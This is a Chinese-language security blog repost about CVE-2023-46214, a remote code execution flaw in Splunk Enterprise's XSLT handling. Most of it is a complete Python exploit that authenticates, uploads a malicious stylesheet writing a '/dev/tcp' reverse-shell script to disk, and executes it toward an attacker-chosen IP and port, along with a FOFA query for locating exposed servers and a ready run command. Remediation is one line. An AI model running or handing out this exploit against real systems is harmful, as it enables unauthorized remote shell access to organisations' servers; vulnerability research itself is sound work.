CVE-2023-46214 漏洞复现 poc exp

admin
admin
admin
140350
文章
117
评论
2024年7月9日10:58:33评论108 views字数 6194阅读20分38秒阅读模式

使

01

漏洞名称

Splunk Enterprise XML Parsing 远程代码执行漏洞

02

漏洞影响

Splunk Enterprise

影响版本

9.0.0 to 9.0.6

9.1.0 to 9.1.1

安全版本

9.0.7

9.1.2

CVE-2023-46214 漏洞复现 poc exp

03

漏洞描述

Splunk Enterprise 是一款强大的数据分析软件,它允许用户从各种来源收集、索引和搜索机器生成的数据。在 Splunk Enterprise 9.0.7 及 9.1.2 版本之前,Splunk Enterprise 未能对用户提供的可扩展样式表语言转换(XSLT)进行安全的清理。这意味着攻击者可以上传恶意的 XSLT,从而导致在 Splunk Enterprise 实例上远程执行代码。

04

FOFA搜索语句
app="splunk-Enterprise"

CVE-2023-46214 漏洞复现 poc exp

05

poc exp

github有公开的exp,地址如下

https://github.com/nathan31337/Splunk-RCE-poc

poc文件内容如下

#!/usr/bin/env python3import argparseimport requestsimport json# proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}proxies = {}def generate_malicious_xsl(ip, port):    return f"""<?xml version="1.0" encoding="UTF-8"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl">  <xsl:template match="/">    <exsl:document href="/opt/splunk/bin/scripts/shell.sh" method="text">        <xsl:text>sh -i &gt;&amp; /dev/tcp/{ip}/{port} 0&gt;&amp;1</xsl:text>    </exsl:document>  </xsl:template></xsl:stylesheet>"""def login(session, url, username, password):    login_url = f"{url}/en-US/account/login?return_to=%2Fen-US%2Faccount%2F"    response = session.get(login_url, proxies=proxies)    cval_value = session.cookies.get("cval", None)    if not cval_value:        return False    auth_payload = {        "cval": cval_value,        "username": username,        "password": password,        "set_has_logged_in": "false",    }    auth_url = f"{url}/en-US/account/login"    response = session.post(auth_url, data=auth_payload, proxies=proxies)    return response.status_code == 200def get_cookie(session, url):    response = session.get(url, proxies=proxies)    return response.status_code == 200def upload_file(session, url, file_content, csrf_token):    files = {'spl-file': ('shell.xsl', file_content, 'application/xslt+xml')}    upload_headers = {        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/119.0",        "Accept": "text/javascript, text/html, application/xml, text/xml, */*",        "X-Requested-With": "XMLHttpRequest",        "X-Splunk-Form-Key": csrf_token,    }    upload_url = f"{url}/en-US/splunkd/__upload/indexing/preview?output_mode=json&props.NO_BINARY_CHECK=1&input.path=shell.xsl"    response = session.post(upload_url, files=files, headers=upload_headers, verify=False, proxies=proxies)    try:        text_value = json.loads(response.text)['messages'][0]['text']        if "concatenate" in text_value:            return False, None        return True, text_value    except (json.JSONDecodeError, KeyError, IndexError):        return False, Nonedef get_job_search_id(session, url, username, csrf_token):    jsid_data = {'search': f'|search test|head 1'}    jsid_url = f"{url}/en-US/splunkd/__raw/servicesNS/{username}/search/search/jobs?output_mode=json"    upload_headers = {        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/119.0",        "X-Requested-With": "XMLHttpRequest",        "X-Splunk-Form-Key": csrf_token,    }    response = session.post(jsid_url, data=jsid_data, headers=upload_headers, verify=False, proxies=proxies)    try:        jsid = json.loads(response.text)['sid']        return True, jsid    except (json.JSONDecodeError, KeyError, IndexError):        return False, Nonedef trigger_xslt_transform(session, url, jsid, text_value):    xslt_headers = {        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/119.0",        "X-Splunk-Module": "Splunk.Module.DispatchingModule",        "Connection": "close",        "Upgrade-Insecure-Requests": "1",        "Accept-Language": "en-US,en;q=0.5",        "Accept-Encoding": "gzip, deflate",        "X-Requested-With": "XMLHttpRequest",    }    exploit_endpoint = f"{url}/en-US/api/search/jobs/{jsid}/results?xsl=/opt/splunk/var/run/splunk/dispatch/{text_value}/shell.xsl"    response = session.get(exploit_endpoint, verify=False, proxies=proxies)    response = session.get(exploit_endpoint, verify=False, headers=xslt_headers, proxies=proxies)    return response.status_code == 200def trigger_reverse_shell(session, url, username, jsid, csrf_token):    runshellscript_data = {'search': f'|runshellscript "shell.sh" "" "" "" "" "" "" "" "{jsid}"'}    runshellscript_url = f"{url}/en-US/splunkd/__raw/servicesNS/{username}/search/search/jobs"    upload_headers = {        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/119.0",        "X-Requested-With": "XMLHttpRequest",        "X-Splunk-Form-Key": csrf_token,    }    response = session.post(runshellscript_url, data=runshellscript_data, headers=upload_headers, verify=False, proxies=proxies)    return response.status_code == 201def main():    parser = argparse.ArgumentParser(description='Splunk CVE-2023-46214 RCE PoC')    parser.add_argument('--url', required=True, help='Splunk instance URL')    parser.add_argument('--username', required=True, help='Splunk username')    parser.add_argument('--password', required=True, help='Splunk password')    parser.add_argument('--ip', required=True, help='Reverse Shell IP')    parser.add_argument('--port', required=True, help='Reverse Shell Port')    args = parser.parse_args()    session = requests.Session()    print("[!] CVE: CVE-2023-46214")    print("[!] Github: https://github.com/nathan31337/Splunk-RCE-poc")    if not login(session, args.url, args.username, args.password):        print("[-] Authentication failed")        exit()    print("[+] Authentication successful")    print("[*] Grabbing CSRF token", end="r")    if not get_cookie(session, f"{args.url}/en-US"):        print("[-] Failed to obtain CSRF token")        exit()    print("[+] CSRF token obtained")    csrf_token = session.cookies.get("splunkweb_csrf_token_8000", None)    malicious_xsl = generate_malicious_xsl(args.ip, args.port)    uploaded, text_value = upload_file(session, args.url, malicious_xsl, csrf_token)    if not uploaded:        print("[-] File upload failed")        exit()    print("[+] Malicious XSL file uploaded successfully")    jsid_created, jsid = get_job_search_id(session, args.url, args.username, csrf_token)    if not jsid_created:        print("[-] Creating job failed")        exit()    print("[+] Job search ID obtained")    print("[*] Grabbing new CSRF token", end="r")    if not get_cookie(session, f"{args.url}/en-US"):        print("[-] Failed to obtain CSRF token")        exit()    print("[+] New CSRF token obtained")    if not trigger_xslt_transform(session, args.url, jsid, text_value):        print("[-] XSLT Transform failed")        exit()    print("[+] Successfully wrote reverse shell to disk")    if not trigger_reverse_shell(session, args.url, args.username, jsid, csrf_token):        print("[-] Failed to execute reverse shell")        exit()    print("[+] Reverse shell executed! Got shell?")if __name__ == "__main__":    main()

运行POC

python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>

06

修复建议

升级到安全版本。

原文始发于微信公众号(AI与网安):CVE-2023-46214 漏洞复现 poc exp

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月9日10:58:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-46214 漏洞复现 poc exphttps://cn-sec.com/archives/2934385.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息